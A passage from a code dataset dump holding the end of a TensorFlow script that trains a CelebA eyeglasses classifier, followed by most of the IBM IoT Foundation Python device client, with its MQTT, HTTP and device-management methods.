= \"Eyeglasses\"\nIMG_SIZE = 64#256\nBATCH_SIZE = 50\nEPOCHS = 100\n\n# get data set\nprint('>>> Get Data Set')\ngcs_base_dir = 'gs://celeb_a_dataset/'\nceleb_a_builder = tfds.builder('celeb_a', data_dir=gcs_base_dir, version='2.0.0')\nceleb_a_builder.download_and_prepare()\n\ndef preprocess_input_dict(feat_dict):\n # Separate out the image and target variable from the feature dictionary.\n image = feat_dict[IMAGE_KEY]\n label = feat_dict[ATTR_KEY][LABEL_KEY]\n\n # Resize and normalize image.\n image = tf.cast(image, tf.float32)\n image = tf.image.resize(image, [IMG_SIZE, IMG_SIZE])\n image /= 255.0\n\n label = tf.cast(label, tf.float32)\n \n feat_dict[IMAGE_KEY] = image\n feat_dict[ATTR_KEY][LABEL_KEY] = label\n \n return feat_dict\n\nget_image_and_label = lambda feat_dict: (feat_dict[IMAGE_KEY], feat_dict[ATTR_KEY][LABEL_KEY])\n\ndef create_model():\n print('>>> Creating model')\n model = keras.Sequential()\n model.add(keras.layers.Flatten(input_shape=(IMG_SIZE, IMG_SIZE, 3))),\n model.add(keras.layers.Dense(60, input_dim=60, activation='relu'))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n model.compile(loss = 'binary_crossentropy', \n optimizer='adam', \n metrics=['accuracy'])\n return model\n\ntrain_ds = celeb_a_builder \\\n .as_dataset(split='train') \\\n .batch(BATCH_SIZE) \\\n .map(preprocess_input_dict) \\\n .map(get_image_and_label)\n\ntest_ds = celeb_a_builder \\\n .as_dataset(split='test') \\\n .batch(1) \\\n .map(preprocess_input_dict) \\\n .map(get_image_and_label)\n\nmodel = create_model()\n\nmodel.summary()\n\nhistory = model.fit(train_ds, epochs=3, steps_per_epoch=EPOCHS)\n\nmodel.evaluate(test_ds)\n\ndef save_model(model, subdir):\n base_dir = tempfile.mkdtemp(prefix='saved_models')\n model_location = os.path.join(base_dir, subdir)\n model.save(model_location, save_format='tf')\n return model_location\n\nmodel_location = save_model(model, 'model_export_unconstrained')\n\nconverter = tf.lite.TFLiteConverter.from_saved_model(model_location) # path to the SavedModel directory\ntflite_model = converter.convert()\n\nwith open('model.tflite', 'wb') as f:\n f.write(tflite_model)","sub_path":"faces/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"287825147","text":"# *****************************************************************************\n# Copyright (c) 2014 IBM Corporation and other Contributors.\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Eclipse Public License v1.0\n# which accompanies this distribution, and is available at\n# http://www.eclipse.org/legal/epl-v10.html\n#\n# Contributors:\n# David Parker - Initial Contribution\n# Lokesh Haralakatta - Added DME Support\n# *****************************************************************************\n\nimport json\nimport re\nimport pytz\nimport uuid\nimport threading\nimport requests\nimport paho.mqtt.client as paho\n\nfrom datetime import datetime\n\nfrom ibmiotf import AbstractClient, HttpAbstractClient, InvalidEventException, UnsupportedAuthenticationMethod,ConfigurationException, ConnectionException, MissingMessageEncoderException,MissingMessageDecoderException\nfrom ibmiotf.codecs import jsonCodec, jsonIotfCodec\n\n\n# Support Python 2.7 and 3.4 versions of configparser\ntry:\n\timport configparser\nexcept ImportError:\n\timport ConfigParser as configparser\n\nCOMMAND_RE = re.compile(\"iot-2/cmd/(.+)/fmt/(.+)\")\n\n\nclass Command:\n\tdef __init__(self, pahoMessage, messageEncoderModules):\n\t\tresult = COMMAND_RE.match(pahoMessage.topic)\n\t\tif result:\n\t\t\tself.command = result.group(1)\n\t\t\tself.format = result.group(2)\n\n\t\t\tif self.format in messageEncoderModules:\n\t\t\t\tmessage = messageEncoderModules[self.format].decode(pahoMessage)\n\t\t\t\tself.timestamp = message.timestamp\n\t\t\t\tself.data = message.data\n\t\t\telse:\n\t\t\t\traise MissingMessageDecoderException(self.format)\n\t\telse:\n\t\t\traise InvalidEventException(\"Received command on invalid topic: %s\" % (pahoMessage.topic))\n\n\nclass Client(AbstractClient):\n\n\tCOMMAND_TOPIC = \"iot-2/cmd/+/fmt/+\"\n\n\tdef __init__(self, options, logHandlers=None):\n\t\tself._options = options\n\n\t\t### DEFAULTS ###\n\t\tif \"domain\" not in self._options:\n\t\t\t# Default to the domain for the public cloud offering\n\t\t\tself._options['domain'] = \"internetofthings.ibmcloud.com\"\n\t\tif \"clean-session\" not in self._options:\n\t\t\tself._options['clean-session'] = \"true\"\n\n\t\tif \"org\" not in self._options:\n\t\t\t# Default to the quickstart\n\t\t\tself._options['org'] = \"quickstart\"\n\n\t\tif \"port\" not in self._options and self._options[\"org\"] != \"quickstart\":\n\t\t\tself._options[\"port\"] = 8883;\n\n\t\tif self._options[\"org\"] == \"quickstart\":\n\t\t\tself._options[\"port\"] = 1883;\n\n\t\t### REQUIRED ###\n\t\tif self._options['org'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: org\")\n\t\tif self._options['type'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: type\")\n\t\tif self._options['id'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: id\")\n\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tif self._options['auth-method'] == None:\n\t\t\t\traise ConfigurationException(\"Missing required property: auth-method\")\n\n\t\t\tif (self._options['auth-method'] == \"token\"):\n\t\t\t\tif self._options['auth-token'] == None:\n\t\t\t\t\traise ConfigurationException(\"Missing required property for token based authentication: auth-token\")\n\t\t\telse:\n\t\t\t\traise UnsupportedAuthenticationMethod(options['auth-method'])\n\n\t\tAbstractClient.__init__(\n\t\t\tself,\n\t\t\tdomain = self._options['domain'],\n\t\t\torganization = self._options['org'],\n\t\t\tclientId = \"d:\" + self._options['org'] + \":\" + self._options['type'] + \":\" + self._options['id'],\n\t\t\tusername = \"use-token-auth\" if (self._options['auth-method'] == \"token\") else None,\n\t\t\tpassword = self._options['auth-token'],\n\t\t\tlogHandlers = logHandlers,\n\t\t\tcleanSession = self._options['clean-session'],\n\t\t\tport = self._options['port']\n\t\t)\n\n\t\t# Add handler for commands if not connected to QuickStart\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tself.client.message_callback_add(\"iot-2/cmd/+/fmt/+\", self.__onCommand)\n\n\t\tself.subscriptionsAcknowledged = threading.Event()\n\n\t\t# Initialize user supplied callback\n\t\tself.commandCallback = None\n\n\t\tself.client.on_connect = self.on_connect\n\n\t\tself.setMessageEncoderModule('json', jsonCodec)\n\t\tself.setMessageEncoderModule('json-iotf', jsonIotfCodec)\n\n\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\t'''\n\t\tThis is called after the client has received a CONNACK message from the broker in response to calling connect().\n\t\tThe parameter rc is an integer giving the return code:\n\n\t\t0: Success\n\t\t1: Refused - unacceptable protocol version\n\t\t2: Refused - identifier rejected\n\t\t3: Refused - server unavailable\n\t\t4: Refused - bad user name or password\n\t\t5: Refused - not authorised\n\t\t'''\n\t\tif rc == 0:\n\t\t\tself.connectEvent.set()\n\t\t\tself.logger.info(\"Connected successfully: %s, Port: %s\" % (self.clientId,self.port))\n\t\t\tif self._options['org'] != \"quickstart\":\n\t\t\t\tself.__subscribeToCommands()\n\t\telif rc == 5:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Not authorized: s (%s, %s, %s)\" % (self.clientId, self.username, self.password)))\n\t\telse:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Connection failed: RC= %s\" % (rc)))\n\n\tdef publishEvent(self, event, msgFormat, data, qos=0, on_publish=None):\n\t\t'''\n\t\tPublish an event in IoTF.\n\n\t\tParameters:\n\t\t\tevent - the name of this event\n\t\t\tmsgFormat - the format of the data for this event\n\t\t\tdata - the data for this event\n\n\t\tOptional paramters:\n\t\t\tqos - the equivalent MQTT semantics of quality of service using the same constants (0, 1 and 2)\n\t\t\ton_publish - a function that will be called when receipt of the publication is confirmed. This\n\t\t\t\t\t\t has different implications depending on the qos:\n\t\t\t\t\t\t qos 0 - the client has asynchronously begun to send the event\n\t\t\t\t\t\t qos 1 and 2 - the client has confirmation of delivery from IoTF\n\t\t'''\n\t\tif not self.connectEvent.wait():\n\t\t\tself.logger.warning(\"Unable to send event %s because device is not currently connected\")\n\t\t\treturn False\n\t\telse:\n\t\t\tself.logger.debug(\"Sending event %s with data %s\" % (event, json.dumps(data)))\n\t\t\ttopic = 'iot-2/evt/'+event+'/fmt/' + msgFormat\n\n\t\t\tif msgFormat in self._messageEncoderModules:\n\t\t\t\tpayload = self._messageEncoderModules[msgFormat].encode(data, datetime.now(pytz.timezone('UTC')))\n\n\t\t\t\ttry:\n\t\t\t\t\t# need to take lock to ensure on_publish is not called before we know the mid\n\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\tself._messagesLock.acquire()\n\n\t\t\t\t\tresult = self.client.publish(topic, payload=payload, qos=qos, retain=False)\n\t\t\t\t\tif result[0] == paho.MQTT_ERR_SUCCESS:\n\t\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\t\tself._onPublishCallbacks[result[1]] = on_publish\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\t\t\t\tfinally:\n\t\t\t\t\tif on_publish is not None:\n\t\t\t\t\t\tself._messagesLock.release()\n\t\t\telse:\n\t\t\t\traise MissingMessageEncoderException(msgFormat)\n\n\n\tdef __subscribeToCommands(self):\n\t\t'''\n\t\tSubscribe to commands sent to this device.\n\t\t'''\n\t\tif self._options['org'] == \"quickstart\":\n\t\t\tself.logger.warning(\"QuickStart applications do not support commands\")\n\t\t\treturn False\n\n\t\tif not self.connectEvent.wait():\n\t\t\tself.logger.warning(\"Unable to subscribe to commands because device is not currently connected\")\n\t\t\treturn False\n\t\telse:\n\t\t\tself.client.subscribe(Client.COMMAND_TOPIC, qos=1)\n\t\t\treturn True\n\n\tdef __onCommand(self, client, userdata, pahoMessage):\n\t\t'''\n\t\tInternal callback for device command messages, parses source device from topic string and\n\t\tpasses the information on to the registerd device command callback\n\t\t'''\n\t\twith self._recvLock:\n\t\t\tself.recv = self.recv + 1\n\t\ttry:\n\t\t\tcommand = Command(pahoMessage, self._messageEncoderModules)\n\t\texcept InvalidEventException as e:\n\t\t\tself.logger.critical(str(e))\n\t\telse:\n\t\t\tself.logger.debug(\"Received command '%s'\" % (command.command))\n\t\t\tif self.commandCallback: self.commandCallback(command)\n\n\nclass HttpClient(HttpAbstractClient):\n\t\"\"\"\n\tA basic device client with limited capabilies that forgoes an active MQTT connection to the service.\n\t\"\"\"\n\n\tdef __init__(self, options, logHandlers=None):\n\t\tself._options = options\n\n\t\t### DEFAULTS ###\n\t\tif \"domain\" not in self._options:\n\t\t\t# Default to the domain for the public cloud offering\n\t\t\tself._options['domain'] = \"internetofthings.ibmcloud.com\"\n\t\tif \"clean-session\" not in self._options:\n\t\t\tself._options['clean-session'] = \"true\"\n\n\t\t### REQUIRED ###\n\t\tif self._options['org'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: org\")\n\t\tif self._options['type'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: type\")\n\t\tif self._options['id'] == None:\n\t\t\traise ConfigurationException(\"Missing required property: id\")\n\n\t\tif self._options['org'] != \"quickstart\":\n\t\t\tif self._options['auth-method'] == None:\n\t\t\t\traise ConfigurationException(\"Missing required property: auth-method\")\n\n\t\t\tif (self._options['auth-method'] == \"token\"):\n\t\t\t\tif self._options['auth-token'] == None:\n\t\t\t\t\traise ConfigurationException(\"Missing required property for token based authentication: auth-token\")\n\t\t\telse:\n\t\t\t\traise UnsupportedAuthenticationMethod(options['authMethod'])\n\n\t\tHttpAbstractClient.__init__(self,\n\t\tclientId = \"httpDevClient:\" + self._options['org'] + \":\" + self._options['type'] + \":\" + self._options['id'],\n \t\tlogHandlers = logHandlers)\n\t\tself.setMessageEncoderModule('json', jsonCodec)\n\n\n\n\tdef publishEvent(self, event, data):\n\t\t\"\"\"\n\t\tPublish an event over HTTP(s) as JSON\n\t\tThrows a ConnectionException with the message \"Server not found\" if the client is unable to reach the server\n\t\tOtherwise it returns the HTTP status code, (200 - 207 for success)\n\t\t\"\"\"\n\t\tself.logger.debug(\"Sending event %s with data %s\" % (event, json.dumps(data)))\n\n\t\ttemplateUrl = 'https://%s.messaging.%s/api/v0002/device/types/%s/devices/%s/events/%s'\n\n\t\torgid = self._options['org']\n\t\tdeviceType = self._options['type']\n\t\tdeviceId = self._options['id']\n\t\tauthMethod = \"use-token-auth\"\n\t\tauthToken = self._options['auth-token']\n\t\tcredentials = (authMethod, authToken)\n\n\t\tif orgid == 'quickstart':\n\t\t\tauthMethod = None\n\t\t\tauthToken = None\n\n\t\tintermediateUrl = templateUrl % (orgid, self._options['domain'], deviceType, deviceId, event)\n\t\tself.logger.debug(\"URL: %s\",intermediateUrl)\n\t\ttry:\n\t\t\tmsgFormat = \"json\"\n\t\t\tpayload = self._messageEncoderModules[msgFormat].encode(data, datetime.now(pytz.timezone('UTC')))\n\t\t\tresponse = requests.post(intermediateUrl, auth = credentials, data = payload, headers = {'content-type': 'application/json'})\n\t\texcept Exception as e:\n\t\t\tself.logger.error(\"POST Failed\")\n\t\t\tself.logger.error(e)\n\t\t\traise ConnectionException(\"Server not found\")\n\n\t\tif response.status_code >= 300:\n\t\t\tself.logger.warning(response.headers)\n\t\treturn response.status_code\n\n\n\nclass DeviceInfo(object):\n\tdef __init__(self):\n\t\tself.serialNumber = None\n\t\tself.manufacturer = None\n\t\tself.model = None\n\t\tself.deviceClass = None\n\t\tself.description = None\n\t\tself.fwVersion = None\n\t\tself.hwVersion = None\n\t\tself.descriptiveLocation = None\n\n\tdef __str__(self):\n\t\treturn json.dumps(self.__dict__, sort_keys=True)\n\n\nclass DeviceFirmware(object):\n\tdef __init__(self,version = None,name = None,url = None,verifier = None,state = None,updateStatus = None,updatedDateTime = None):\n\t\tself.version = version\n\t\tself.name = name\n\t\tself.url = url\n\t\tself.verifier = verifier\n\t\tself.state = state\n\t\tself.updateStatus = updateStatus\n\t\tself.updatedDateTime = updatedDateTime\n\n\tdef __str__(self):\n\t\treturn json.dumps(self.__dict__, sort_keys=True)\n\n\nclass ManagedClient(Client):\n\n\t# Publish MQTT topics\n\tMANAGE_TOPIC = 'iotdevice-1/mgmt/manage'\n\tUNMANAGE_TOPIC = 'iotdevice-1/mgmt/unmanage'\n\tUPDATE_LOCATION_TOPIC = 'iotdevice-1/device/update/location'\n\tADD_ERROR_CODE_TOPIC = 'iotdevice-1/add/diag/errorCodes'\n\tCLEAR_ERROR_CODES_TOPIC = 'iotdevice-1/clear/diag/errorCodes'\n\tNOTIFY_TOPIC = 'iotdevice-1/notify'\n\tRESPONSE_TOPIC = 'iotdevice-1/response'\n\tADD_LOG_TOPIC = 'iotdevice-1/add/diag/log'\n\tCLEAR_LOG_TOPIC = 'iotdevice-1/clear/diag/log'\n\n\t# Subscribe MQTT topics\n\tDM_RESPONSE_TOPIC = 'iotdm-1/response'\n\tDM_OBSERVE_TOPIC = 'iotdm-1/observe'\n\tDM_REBOOT_TOPIC = 'iotdm-1/mgmt/initiate/device/reboot'\n\tDM_FACTORY_REESET ='iotdm-1/mgmt/initiate/device/factory_reset'\n\tDM_UPDATE_TOPIC = 'iotdm-1/device/update'\n\tDM_CANCEL_OBSERVE_TOPIC = 'iotdm-1/cancel'\n\tDM_FIRMWARE_DOWNLOAD_TOPIC = 'iotdm-1/mgmt/initiate/firmware/download'\n\tDM_FIRMWARE_UPDATE_TOPIC = 'iotdm-1/mgmt/initiate/firmware/update'\n\tDME_ACTION_TOPIC = 'iotdm-1/mgmt/custom/#'\n\n\t#ResponceCode\n\tRESPONSECODE_FUNCTION_NOT_SUPPORTED = 501\n\tRESPONSECODE_ACCEPTED = 202\n\tRESPONSECODE_INTERNAL_ERROR = 500\n\tRESPONSECODE_BAD_REQUEST = 400\n\n\tUPDATESTATE_IDLE = 0\n\tUPDATESTATE_DOWNLOADING = 1\n\tUPDATESTATE_DOWNLOADED = 2\n\tUPDATESTATE_SUCCESS = 0\n\tUPDATESTATE_IN_PROGRESS = 1\n\tUPDATESTATE_OUT_OF_MEMORY = 2\n\tUPDATESTATE_CONNECTION_LOST = 3\n\tUPDATESTATE_VERIFICATION_FAILED = 4\n\tUPDATESTATE_UNSUPPORTED_IMAGE = 5\n\tUPDATESTATE_INVALID_URI = 6\n\n\n\tdef __init__(self, options, logHandlers=None, deviceInfo=None):\n\t\tif options['org'] == \"quickstart\":\n\t\t\traise Exception(\"Unable to create ManagedClient instance. QuickStart devices do not support device management\")\n\n\t\tClient.__init__(self, options, logHandlers)\n\t\t# TODO: Raise fatal exception if tries to create managed device client for QuickStart\n\n\t\t# Initialize user supplied callback\n\t\tself.deviceActionCallback = None\n\t\tself.firmwereActionCallback = None\n\t\tself.dmeActionCallback = None\n\n\t\t# Add handler for supported device management commands\n\t\tself.client.message_callback_add(\"iotdm-1/#\", self.__onDeviceMgmtResponse)\n\t\tself.client.message_callback_add(ManagedClient.DM_REBOOT_TOPIC, self.__onRebootRequest)\n\t\tself.client.message_callback_add(ManagedClient.DM_FACTORY_REESET, self.__onFactoryResetRequest)\n\t\tself.client.message_callback_add(ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,self.__onFirmwereUpdate)\n\t\tself.client.message_callback_add(ManagedClient.DM_OBSERVE_TOPIC,self.__onFirmwereObserve)\n\t\tself.client.message_callback_add(ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,self.__onFirmwereDownload)\n\t\tself.client.message_callback_add(ManagedClient.DM_UPDATE_TOPIC,self.__onUpdatedDevice)\n\t\tself.client.message_callback_add(ManagedClient.DM_CANCEL_OBSERVE_TOPIC,self.__onFirmwereCancel)\n\t\tself.client.message_callback_add(ManagedClient.DME_ACTION_TOPIC,self.__onDMEActionRequest)\n\n\t\tself.client.on_subscribe = self.on_subscribe\n\n\t\tself.readyForDeviceMgmt = threading.Event()\n\n\t\t# List of DM requests that have not received a response yet\n\t\tself._deviceMgmtRequestsPendingLock = threading.Lock()\n\t\tself._deviceMgmtRequestsPending = {}\n\n\t\t# List of DM notify hook\n\t\tself._deviceMgmtObservationsLock = threading.Lock()\n\t\tself._deviceMgmtObservations = []\n\n\t\t# Initialize local device data model\n\t\tself.metadata = {}\n\t\tif deviceInfo is not None:\n\t\t\tself._deviceInfo = deviceInfo\n\t\telse:\n\t\t\tself._deviceInfo = DeviceInfo()\n\n\t\tself._location = None\n\t\tself._errorCode = None\n\t\tself.__firmwareUpdate = None\n\n\t\tself.manageTimer = None\n\n\tdef setSerialNumber(self, serialNumber):\n\t\tself._deviceInfo.serialNumber = serialNumber\n\t\treturn self.notifyFieldChange(\"deviceInfo.serialNumber\", serialNumber)\n\n\tdef setManufacturer(self, manufacturer):\n\t\tself._deviceInfo.serialNumber = manufacturer\n\t\treturn self.notifyFieldChange(\"deviceInfo.manufacturer\", manufacturer)\n\n\tdef setModel(self, model):\n\t\tself._deviceInfo.serialNumber = model\n\t\treturn self.notifyFieldChange(\"deviceInfo.model\", model)\n\n\tdef setdeviceClass(self, deviceClass):\n\t\tself._deviceInfo.deviceClass = deviceClass\n\t\treturn self.notifyFieldChange(\"deviceInfo.deviceClass\", deviceClass)\n\n\tdef setDescription(self, description):\n\t\tself._deviceInfo.description = description\n\t\treturn self.notifyFieldChange(\"deviceInfo.description\", description)\n\n\tdef setFwVersion(self, fwVersion):\n\t\tself._deviceInfo.fwVersion = fwVersion\n\t\treturn self.notifyFieldChange(\"deviceInfo.fwVersion\", fwVersion)\n\n\tdef setHwVersion(self, hwVersion):\n\t\tself._deviceInfo.hwVersion = hwVersion\n\t\treturn self.notifyFieldChange(\"deviceInfo.hwVersion\", hwVersion)\n\n\tdef setDescriptiveLocation(self, descriptiveLocation):\n\t\tself._deviceInfo.descriptiveLocation = descriptiveLocation\n\t\treturn self.notifyFieldChange(\"deviceInfo.descriptiveLocation\", descriptiveLocation)\n\n\n\tdef notifyFieldChange(self, field, value):\n\t\twith self._deviceMgmtObservationsLock:\n\t\t\tif field in self._deviceMgmtObservations:\n\t\t\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\t\t\tself.logger.warning(\"Unable to notify service of field change because device is not ready for device management\")\n\t\t\t\t\treturn threading.Event().set()\n\n\t\t\t\treqId = str(uuid.uuid4())\n\t\t\t\tmessage = {\n\t\t\t\t\t\"d\": {\n\t\t\t\t\t\t\"field\": field,\n\t\t\t\t\t\t\"value\": value\n\t\t\t\t\t},\n\t\t\t\t\t\"reqId\": reqId\n\t\t\t\t}\n\n\t\t\t\tresolvedEvent = threading.Event()\n\t\t\t\tself.client.publish(ManagedClient.NOTIFY_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\t\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.NOTIFY_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\t\t\treturn resolvedEvent\n\t\t\telse:\n\t\t\t\treturn threading.Event().set()\n\t'''\n\tThis is called after the client has received a CONNACK message from the broker in response to calling connect().\n\tThe parameter rc is an integer giving the return code:\n\t0: Success\n\t1: Refused - unacceptable protocol version\n\t2: Refused - identifier rejected\n\t3: Refused - server unavailable\n\t4: Refused - bad user name or password\n\t5: Refused - not authorised\n\t'''\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\tif rc == 0:\n\t\t\tself.connectEvent.set()\n\t\t\tself.logger.info(\"Connected successfully: %s, Port: %s\" % (self.clientId,self.port))\n\t\t\tif self._options['org'] != \"quickstart\":\n\t\t\t\tself.client.subscribe( [(ManagedClient.DM_RESPONSE_TOPIC, 1), (ManagedClient.DM_OBSERVE_TOPIC, 1),\n\t\t\t\t(ManagedClient.DM_REBOOT_TOPIC,1),(ManagedClient.DM_FACTORY_REESET,1),(ManagedClient.DM_UPDATE_TOPIC,1),\n\t\t\t\t(ManagedClient.DM_FIRMWARE_UPDATE_TOPIC,1),(ManagedClient.DM_FIRMWARE_DOWNLOAD_TOPIC,1),\n\t\t\t\t(ManagedClient.DM_CANCEL_OBSERVE_TOPIC,1),(Client.COMMAND_TOPIC, 1),(ManagedClient.DME_ACTION_TOPIC,1)] )\n\t\telif rc == 5:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Not authorized: s (%s, %s, %s)\" % (self.clientId, self.username, self.password)))\n\t\telse:\n\t\t\tself.logAndRaiseException(ConnectionException(\"Connection failed: RC= %s\" % (rc)))\n\n\n\tdef on_subscribe(self, client, userdata, mid, granted_qos):\n\t\t# Once IoTF acknowledges the subscriptions we are able to process commands and responses from device management server\n\t\tself.subscriptionsAcknowledged.set()\n\t\tself.manage()\n\n\n\tdef manage(self, lifetime=3600, supportDeviceActions=True, supportFirmwareActions=True,\n\t\t\t\t\tsupportDeviceMgmtExtActions=False, bundleIds=[]):\n\t\t# TODO: throw an error, minimum lifetime this client will support is 1 hour, but for now set lifetime to infinite if it's invalid\n\t\tif lifetime < 3600:\n\t\t\tlifetime = 0\n\n\t\tif not self.subscriptionsAcknowledged.wait():\n\t\t\tself.logger.warning(\"Unable to send register for device management because device subscriptions are not in place\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\t\t'd': {\n\t\t\t\t\t\t\t\"lifetime\": lifetime,\n\t\t\t\t\t\t\t\"supports\": {\n\t\t\t\t\t\t\t\t\t\t\t\"deviceActions\": supportDeviceActions,\n\t\t\t\t\t\t\t\t\t\t\t\"firmwareActions\": supportFirmwareActions,\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"deviceInfo\" : self._deviceInfo.__dict__,\n\t\t\t\t\t\t\t\"metadata\" : self.metadata\n\t\t\t\t\t\t},\n\t\t\t\t\t'reqId': reqId\n\t\t\t\t}\n\t\tif supportDeviceMgmtExtActions and len(bundleIds) > 0:\n\t\t\tfor bundleId in bundleIds:\n\t\t\t\tmessage['d']['supports'][bundleId] = supportDeviceMgmtExtActions\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.MANAGE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.MANAGE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\t# Register the future call back to Watson IoT Platform 2 minutes before the device lifetime expiry\n\t\tif lifetime != 0:\n\t\t\tif self.manageTimer is not None:\n\t\t\t\tself._logger.debug(\"Cancelling existing manage timer\")\n\t\t\t\tself.manageTimer.cancel()\n\t\t\tself.manageTimer = threading.Timer(lifetime-120, self.manage,\n\t\t [lifetime, supportDeviceActions, supportFirmwareActions, supportDeviceMgmtExtActions, bundleIds]).start()\n\n\t\treturn resolvedEvent\n\n\n\tdef unmanage(self):\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to set device to unmanaged because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t'reqId': reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.UNMANAGE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.UNMANAGE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef setLocation(self, longitude, latitude, elevation=None, accuracy=None):\n\t\t# TODO: Add validation (e.g. ensure numeric values)\n\t\tif self._location is None:\n\t\t\tself._location = {}\n\n\t\tself._location['longitude'] = longitude\n\t\tself._location['latitude'] = latitude\n\t\tif elevation:\n\t\t\tself._location['elevation'] = elevation\n\n\t\tself._location['measuredDateTime'] = datetime.now(pytz.timezone('UTC')).isoformat()\n\n\t\tif accuracy:\n\t\t\tself._location['accuracy'] = accuracy\n\t\telif \"accuracy\" in self._location:\n\t\t\tdel self._location[\"accuracy\"]\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish device location because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": self._location,\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.UPDATE_LOCATION_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.UPDATE_LOCATION_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\n\tdef setErrorCode(self, errorCode=0):\n\t\tif errorCode is None:\n\t\t\terrorCode = 0;\n\n\t\tself._errorCode = errorCode\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish error code because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": { \"errorCode\": errorCode },\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.ADD_ERROR_CODE_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.ADD_ERROR_CODE_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef clearErrorCodes(self):\n\t\tself._errorCode = None\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to clear error codes because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.CLEAR_ERROR_CODES_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.CLEAR_ERROR_CODES_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef addLog(self, msg=\"\",data=\"\",sensitivity=0):\n\t\ttimestamp = datetime.now().isoformat()\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to publish error code because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"d\": {\n\t\t\t\t\"message\": msg,\n \"timestamp\": timestamp,\n \"data\": data,\n \"severity\": sensitivity\n },\n\t\t\t\"reqId\": reqId\n\t\t}\n\n\t\tresolvedEvent = threading.Event()\n\t\tself.client.publish(ManagedClient.ADD_LOG_TOPIC, payload=json.dumps(message), qos=1, retain=False)\n\t\twith self._deviceMgmtRequestsPendingLock:\n\t\t\tself._deviceMgmtRequestsPending[reqId] = {\"topic\": ManagedClient.ADD_LOG_TOPIC, \"message\": message, \"event\": resolvedEvent}\n\n\t\treturn resolvedEvent\n\n\tdef clearLog(self):\n\n\t\tif not self.readyForDeviceMgmt.wait():\n\t\t\tself.logger.warning(\"Unable to clear log because device is not ready for device management\")\n\t\t\treturn threading.Event().set()\n\n\t\treqId = str(uuid.uuid4())\n\t\tmessage = {\n\t\t\t\"reqId\": 